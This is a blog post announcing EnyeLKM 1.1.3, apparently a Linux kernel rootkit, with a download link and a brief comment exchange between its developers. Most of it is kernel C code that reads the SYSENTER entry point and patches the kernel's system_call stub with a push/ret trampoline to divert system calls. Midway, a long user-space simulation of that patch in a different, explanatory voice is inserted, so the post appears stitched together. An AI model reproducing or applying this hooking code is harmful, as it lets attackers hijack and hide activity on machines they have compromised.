EnyeLKM 1.1.3


http://www.fr33project.org/projects/enyelkm-1.1.3.rar

EnyeLKM 1.1.2 obtains the SYSENTER entry point at run time with the instruction rdmsr( MSR_IA32_SYSENTER_EIP, psysenter_entry, v2 ); it does not give a single warning when running make!!!

All of base.c has also been rewritten, and two new modules have been created:

extern_symbols: where the functions that obtain symbols external to the LKM live, for example:

    /* thx to Int27h :-). */
    void * get_sysenter_entry( void )
    {
        void * psysenter_entry = NULL ;
        unsigned long v2 ;

        /* only CPUs with SEP have the SYSENTER MSRs; rdmsr() reads the
         * low 32 bits (the entry point) into psysenter_entry and the
         * high 32 bits into v2 */
        if ( boot_cpu_has( X86_FEATURE_SEP ) )
            rdmsr( MSR_IA32_SYSENTER_EIP, psysenter_entry, v2 );
        else
            return NULL;

        return psysenter_entry;
    }

The lowlevel_layer module has also been created: thanks to it, the modules that search memory for opcodes, and the rest of the functions, are kept well away from the low-level details. For example:

    void set_idt_handler( void * system_call )
    {
        unsigned char * p;
        push_ret_t push_ret;

        p = (unsigned char *) system_call;

        /* first jump: scan forward to the jnb that follows cmp $NR_syscalls,%eax */
        while ( !is_jnb_opcode( (unsigned char *) p ) )
            p ++;

        /* back up to the cmp so the trampoline overwrites it */
        p -= DISTANCE_FROM_CMP_NR_SYSCALL_TO_JNB;

        /* write "push new_idt ; ret" over the cmp */
        create_push_ret( & push_ret, (unsigned long) new_idt );
        write_push_ret( ( void *) p, & push_ret );
    }

And before, this looked like:

    void set_idt_handler(void *system_call)
    {
        unsigned char *p;
        unsigned long *p2;

        p = (unsigned char *) system_call;

        /* first jump: jnb rel32 is the two-byte opcode 0x0f 0x83 */
        while (!((*p == 0x0f) && (*(p+1) == 0x83)))
            p++;

        /* back up over the 5-byte cmp $NR_syscalls,%eax */
        p -= 5;

        /* push imm32 */
        *p++ = 0x68;
        p2 = (unsigned long *) p;
        *p2++ = (unsigned long) new_idt;
        p = (unsigned char *) p2;

        /* ret */
        *p = 0xc3;
    }

As we can see, it is now much easier to abstract away from the problem thanks to the "lowlevel" layer.

The next thing I will develop is the ability to unload the module; for that, at least one more module will have to be created, for memory management with write-and-restore of what was patched at load time.
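To make the "lowlevel" layer concrete, here is an added example (not code from EnyeLKM): a user-space model of the helpers that set_idt_handler() relies on. The kernel entry point is replaced by a constructed byte buffer that imitates the first instructions of the i386 system_call stub (cmp $NR_syscalls,%eax followed by jnb), so the scan-back-patch logic can be run and checked without ring 0. The helper names is_jnb_opcode, create_push_ret and write_push_ret are taken from the post, but their bodies, the constant values and the bounds checks are this example's own assumptions, not the project's code; the original loop scans unbounded, whereas this version stops at the end of the buffer and reports failure instead of running off the end.

```c
/*
 * Added example, not EnyeLKM code: user-space model of the lowlevel
 * layer used by set_idt_handler().  All values are constructed for
 * illustration and are not copied from any kernel.
 */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* cmp $imm32,%eax is 3d imm32: 5 bytes, so the jnb sits 5 bytes after it */
#define DISTANCE_FROM_CMP_NR_SYSCALL_TO_JNB 5

/* "push imm32 ; ret" trampoline: 68 <imm32 little-endian> c3, 6 bytes */
typedef struct {
    unsigned char bytes[6];
} push_ret_t;

/* jnb/jae rel32 is the two-byte opcode 0f 83 */
int is_jnb_opcode(const unsigned char *p)
{
    return p[0] == 0x0f && p[1] == 0x83;
}

/* encode the trampoline byte by byte so the result is endian-independent */
void create_push_ret(push_ret_t *pr, unsigned long target)
{
    pr->bytes[0] = 0x68;
    for (int i = 0; i < 4; i++)
        pr->bytes[1 + i] = (unsigned char) (target >> (8 * i));
    pr->bytes[5] = 0xc3;
}

void write_push_ret(void *dst, const push_ret_t *pr)
{
    memcpy(dst, pr->bytes, sizeof pr->bytes);
}

/*
 * Same logic as the post's set_idt_handler(), bounded to len bytes.
 * Returns the offset at which the trampoline was written, or -1 if no
 * jnb was found or the patch would not fit inside the buffer.
 */
long set_idt_handler_sim(unsigned char *system_call, size_t len,
                         unsigned long new_idt)
{
    unsigned char *p = system_call;
    unsigned char *end = system_call + len - 1; /* is_jnb_opcode reads p[1] */
    push_ret_t push_ret;

    /* first jump */
    while (p < end && !is_jnb_opcode(p))
        p++;
    if (p >= end)
        return -1;

    if (p - system_call < DISTANCE_FROM_CMP_NR_SYSCALL_TO_JNB)
        return -1;
    p -= DISTANCE_FROM_CMP_NR_SYSCALL_TO_JNB;
    if ((size_t) (p - system_call) + sizeof push_ret.bytes > len)
        return -1;

    create_push_ret(&push_ret, new_idt);
    write_push_ret(p, &push_ret);
    return p - system_call;
}

/* Constructed stand-in for the start of the i386 system_call entry:
 *   push %eax ; cmp $NR_syscalls,%eax ; jnb syscall_badsys ; call *table(,%eax,4) */
static unsigned char fake_system_call[] = {
    0x50,                                     /* push %eax            (offset 0) */
    0x3d, 0x3c, 0x01, 0x00, 0x00,             /* cmp $0x13c,%eax      (offset 1) */
    0x0f, 0x83, 0x10, 0x00, 0x00, 0x00,       /* jnb +0x10            (offset 6) */
    0xff, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, /* call *0(,%eax,4)     (offset 12) */
};

int main(void)
{
    long off = set_idt_handler_sim(fake_system_call, sizeof fake_system_call,
                                   0xc0123456UL); /* hypothetical new_idt */
    printf("trampoline written at offset %ld\n", off);
    for (size_t i = 0; i < sizeof fake_system_call; i++)
        printf("%02x ", fake_system_call[i]);
    putchar('\n');
    return off < 0;
}
```

After the patch, offset 1 holds 68 56 34 12 c0 c3: the cmp is gone and the first byte of the jnb has been swallowed by the ret, which is exactly what the kernel version does to the real entry stub; the leftover 83 10 00 00 00 is never executed because control has already gone to new_idt. The bounds checks are the caveat a practitioner would want: in the kernel, an entry stub whose layout differs from the expected cmp/jnb pair would make the unbounded scan patch the wrong bytes.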

What do you think, RaiSe? Do you like it?


Posted by David Reguera Garcia

2 Responses to “EnyeLKM 1.1.3”

  1. RaiSe Says:

    I like it, I like it :). Maybe a bit excessive, so much formalism, but well, much better this way, haha. The sysenter is much better like that; I still have not been able to check it, tomorrow I will check it on vmware and see how it goes :). The load/unload, that is important, because when developing it is a pain in the arse to be resetting haha. About creating another 'module', that rather confused me a bit: it is not another module, it is another file, no? It is because when I read it I thought you were loading another lkm. Greetings.

  2. David Reguera Garcia Says:

    Yes, it is another file, well, a module of the project, not of the kernel :-).
